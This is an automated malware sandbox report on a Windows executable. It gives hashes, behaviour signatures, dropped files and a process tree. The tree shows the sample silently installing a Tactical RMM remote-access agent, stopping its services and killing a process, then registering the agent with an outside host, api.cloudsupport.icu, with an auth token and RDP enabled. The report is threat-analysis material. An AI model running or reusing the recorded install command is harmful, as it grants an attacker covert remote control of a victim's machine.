Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    15/03/2024, 19:39

General

  • Target

    cc41373244065f99bed8169352989282.exe

  • Size

    4.8MB

  • MD5

    cc41373244065f99bed8169352989282

  • SHA1

    a3d1e62b6d3d2d08b8086c8b41f1c40082939e7d

  • SHA256

    aeb024cbf3c0d9f204dbc2b675bc378ae9c0265e4dd9f907af310c134388b2b1

  • SHA512

    2aa4964d7e400c538b16a1571dfdfae8df96f62533509ebc20b581f2af9ed237b3d41f79caf8987f32e828967394f3746c254bd85ce328d346bcf41489d4c607

  • SSDEEP

    49152:OpqjO23GnEZJDl2i13vojozxZ69VWfDJj1vs3Kd972h+yKMr5ztspoF9V1+:Dj5WnEZf2iWyn6zWNj15Gtyb

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cc41373244065f99bed8169352989282.exe
    "C:\Users\Admin\AppData\Local\Temp\cc41373244065f99bed8169352989282.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\Temp\winagent-v1.5.7.exe
      C:\Windows\Temp\winagent-v1.5.7.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1756
      • C:\Users\Admin\AppData\Local\Temp\is-GGSNF.tmp\winagent-v1.5.7.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-GGSNF.tmp\winagent-v1.5.7.tmp" /SL5="$40184,3479240,824832,C:\Windows\Temp\winagent-v1.5.7.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Program Files directory
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1412
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:852
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1812
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
                PID:1632
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c net stop checkrunner
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1652
            • C:\Windows\SysWOW64\net.exe
              net stop checkrunner
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1836
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop checkrunner
                6⤵
                  PID:1568
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c net stop tacticalrpc
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1668
              • C:\Windows\SysWOW64\net.exe
                net stop tacticalrpc
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1532
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop tacticalrpc
                  6⤵
                    PID:1444
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2444
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM tacticalrmm.exe
                  5⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2352
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c net start tacticalagent && ping 127.0.0.1 -n 2
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1540
                • C:\Windows\SysWOW64\net.exe
                  net start tacticalagent
                  5⤵
                    PID:2316
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start tacticalagent
                      6⤵
                        PID:1072
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /c net start tacticalrpc
                    4⤵
                      PID:1076
                      • C:\Windows\SysWOW64\net.exe
                        net start tacticalrpc
                        5⤵
                          PID:1316
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 start tacticalrpc
                            6⤵
                              PID:1612
                    • C:\Program Files\TacticalAgent\tacticalrmm.exe
                      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.cloudsupport.icu --client-id 10 --site-id 11 --agent-type workstation --auth d06c5a517691e97f9b03431a179223a5ad8bccb82161f49f691b944804906ee4 -rdp -ping -power
                      2⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2008

                  Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Program Files\TacticalAgent\tacticalrmm.exe

                          Filesize

                          1.1MB

                          MD5

                          bab901804df2d8036b85a408fa16110f

                          SHA1

                          e29d1fd19624c403e6c2d5f3cea2961c630bd518

                          SHA256

                          1dd11bc46cedee6fa85b2fa3bfca9adecb677369f8e1d8bf373ac604f9aeeab9

                          SHA512

                          bd8c6c12694a0bfa350181749e39be5e9805783f6efd541bf8d1e0a4e16b8175f0e4e439a20f779ee2d9671b14c62550632c4a49ef614acfc1d5e771a1259f38

                        • C:\Program Files\TacticalAgent\tacticalrmm.exe

                          Filesize

                          1007KB

                          MD5

                          458a820d1ea165255795f475d3961ed9

                          SHA1

                          fb5137866315bf3219ffb3fc63b4c8c845404e18

                          SHA256

                          ab528021ff0a59b8b1fe59aad7615ebf6c52b1910f5868724329653cbe6d6f13

                          SHA512

                          a6c356679e4d9386c3851528a32e3f67082c0ca1b20bd23aba6149ea22327b8e0322300612a09f273a3438c2740506aedd36fcb033d7a73871dae2660b605cd4

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                          Filesize

                          67KB

                          MD5

                          753df6889fd7410a2e9fe333da83a429

                          SHA1

                          3c425f16e8267186061dd48ac1c77c122962456e

                          SHA256

                          b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

                          SHA512

                          9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                          Filesize

                          1KB

                          MD5

                          a266bb7dcc38a562631361bbf61dd11b

                          SHA1

                          3b1efd3a66ea28b16697394703a72ca340a05bd5

                          SHA256

                          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                          SHA512

                          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                          Filesize

                          344B

                          MD5

                          120ca2bb9aa12e14e44ccd52bbebfc8c

                          SHA1

                          5c52819a36b3e4efea6918d0c5e18dfac591f38e

                          SHA256

                          8869c7d6c9dc486445f47c54fad14e871a853585f4e749f45465766c32b7eb18

                          SHA512

                          0ac09ec84be41613ee6a8f9d44700f7b8a32a2ef9e312942454576661457fdda357567d8aaf52ae1fcc2795d2d0daafc604a58b8fd15db771f511ecb9819f80b

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                          Filesize

                          242B

                          MD5

                          2d51cc2bca25624ef55921f5eb89894b

                          SHA1

                          8ac02e31195a514abe07ad079364fbd96b6fe319

                          SHA256

                          95e2ac205d4ddc8335c2ce9d8adf2e3ae416719aa2540270b1233ecce8b17b02

                          SHA512

                          0f2b1f1471713bf1555633ac55b7d0643a14c6e20347d1eca1bb45754d54bcc28d14e2e6a31643e5447799cafbbbff1c0c3096cce350f8d4d5b973235457841a

                        • C:\Users\Admin\AppData\Local\Temp\Tar75A2.tmp

                          Filesize

                          175KB

                          MD5

                          dd73cead4b93366cf3465c8cd32e2796

                          SHA1

                          74546226dfe9ceb8184651e920d1dbfb432b314e

                          SHA256

                          a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

                          SHA512

                          ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

                        • C:\Users\Admin\AppData\Local\Temp\is-GGSNF.tmp\winagent-v1.5.7.tmp

                          Filesize

                          894KB

                          MD5

                          68e149f5f1890d736e404c5522f2c625

                          SHA1

                          8c479153d144db8a38a50e88b15f93c0d13f7f4e

                          SHA256

                          e847330da445e56b2f2048c70a75cfce0902ea313b448f05ddd2d60c38a0e059

                          SHA512

                          9c7c47958bad6efe35dd690f30bb308fd1eb14f2bcd7ca77a58911ce4e8aae2f97d865ed7a3f92c3d46aa5c5ca4beb96162b9cd50b0e9fd323887c853e1b781b

                        • C:\Users\Admin\AppData\Local\Temp\is-GGSNF.tmp\winagent-v1.5.7.tmp

                          Filesize

                          658KB

                          MD5

                          aadd4dc40ea7c8a301b3e198a79c5fe7

                          SHA1

                          edff7edcf8c8fdbd6597dfacaccfe6afefacdf56

                          SHA256

                          7eb3a4646217bbb2d2227f69a47204d2963e3edb08d4b19044a67e01e9506f73

                          SHA512

                          1bc34166c8dbdf0191292c3c14deb9273b30fb0d6044f74ff2875d213f76327da715911289205126e5669aa8c7e584731bcbb3b9da8401a0d8ed3b24c2b8175a

                        • C:\Windows\Temp\winagent-v1.5.7.exe

                          Filesize

                          1.9MB

                          MD5

                          25372688697ab642cf572fd4560d4c4a

                          SHA1

                          bf207dcc68ed8126d24c99cc589dc89625fdc3b5

                          SHA256

                          6cee0d5db2da2e3d6179228b91d7da1b0dd166322fb94af1e89ec38fe0dbb29f

                          SHA512

                          65bfbd853ff4488301e83cb95bedb058237170a3e9abef8f820e33733dc54beb4deff9e0d92320ecc29a5a69825225343965c9acf92415e0927999e8cae13864

                        • C:\Windows\Temp\winagent-v1.5.7.exe

                          Filesize

                          1.0MB

                          MD5

                          b30d54438bc62fdc98b7c76d1333b940

                          SHA1

                          cf1f8a92bfaa16efa9cd9fee943e04afceda2178

                          SHA256

                          6b8c732bfc5a59dda93826c2d4d5722cff2b911c84ec0539d3ae11a32d3fc953

                          SHA512

                          8dc29340451f14664172f15a0b5f31c61540690b630e7c317ea527d67ef88487f9d37d5a7d5cd8066e824be639e42fdddfff482419427e57304f9c2bd3ab8fc8

                        • \Program Files\TacticalAgent\tacticalrmm.exe

                          Filesize

                          1.2MB

                          MD5

                          bf502cbf501ff30fe57e36d0eb5ef1c0

                          SHA1

                          5f3b6abf8b1e592c1a5f7f4d4f6ce2e743ee7731

                          SHA256

                          655e20eb2cade1babb59c8f7b5d23f86187b30c44b061609ace6062cd0f07a1d

                          SHA512

                          872b9dbfa5b1f9f5236c2eb2f5cce5352146f7dc52a9dd364b9241c25291d2dc0dd7f0d46b832885fd12c6a5f05c0ebef37ddbabc31c446e0ef660861e064576

                        • \Program Files\TacticalAgent\tacticalrmm.exe

                          Filesize

                          9.0MB

                          MD5

                          89f1fa3e6f84f68a5a971957eb0a63c7

                          SHA1

                          f0da2afb54b078df949444965f1bcc6c62ce21ad

                          SHA256

                          c304e889b1eee325b072078403bdda01e9401afe379b0af8b4aaffa129b339b3

                          SHA512

                          e4cfa8de5f87eaf5badd089af9b0c4a1892285ad19779782d1eb31973954d22c2a4baa50ccd85b10fe689e98680aea388b6f0955fb35a594a69800da820e2cb9

                        • \Program Files\TacticalAgent\tacticalrmm.exe

                          Filesize

                          512KB

                          MD5

                          2484846f2720a259a9e4abacf3646108

                          SHA1

                          7c086e0722cb9a6dc404ac798ed2e3bb0b0cbc94

                          SHA256

                          0b3235c6e6ca11c90e31fb9f7358e1923e343f19f2909d71175b87eff1231078

                          SHA512

                          ab3e0836ce94d48ce64bcca5124087e02e1875a1ffa37af32c304d78056e437a526fca3886fcaa3c5bb42df76c5edd7eb3029c4bccc7ade691362543b0d468bd

                        • \Users\Admin\AppData\Local\Temp\is-GGSNF.tmp\winagent-v1.5.7.tmp

                          Filesize

                          818KB

                          MD5

                          d3f68e2c308f12c52a4b795531b82037

                          SHA1

                          21198f74ac7b7a8ce791614cd0ea405c1d00f2f7

                          SHA256

                          d7486ff3bcc60ae156f23e6143f7bb6da7c18c2131332f9f69d942946b97cb30

                          SHA512

                          11dc253a053b5efd7090ca7f065c5caa9b7381131b7c98845645a7c52547e822d2a92ee64ced804a3ce07b08930f3925092b6d5d274e3b720d1f1a5bfcc4c33d

                        • memory/1412-104-0x0000000000400000-0x00000000006F9000-memory.dmp

                          Filesize

                          3.0MB

                        • memory/1412-88-0x0000000000240000-0x0000000000241000-memory.dmp

                          Filesize

                          4KB

                        • memory/1756-105-0x0000000000400000-0x00000000004D7000-memory.dmp

                          Filesize

                          860KB

                        • memory/1756-82-0x0000000000400000-0x00000000004D7000-memory.dmp

                          Filesize

                          860KB

                        • memory/1756-79-0x0000000000400000-0x00000000004D7000-memory.dmp

                          Filesize

                          860KB

                        • memory/2008-109-0x0000000140000000-0x00000001405E8000-memory.dmp

                          Filesize

                          5.9MB

                        • memory/2008-110-0x0000000140000000-0x00000001405E8000-memory.dmp

                          Filesize

                          5.9MB

                        • memory/2008-114-0x0000000140000000-0x00000001405E8000-memory.dmp

                          Filesize

                          5.9MB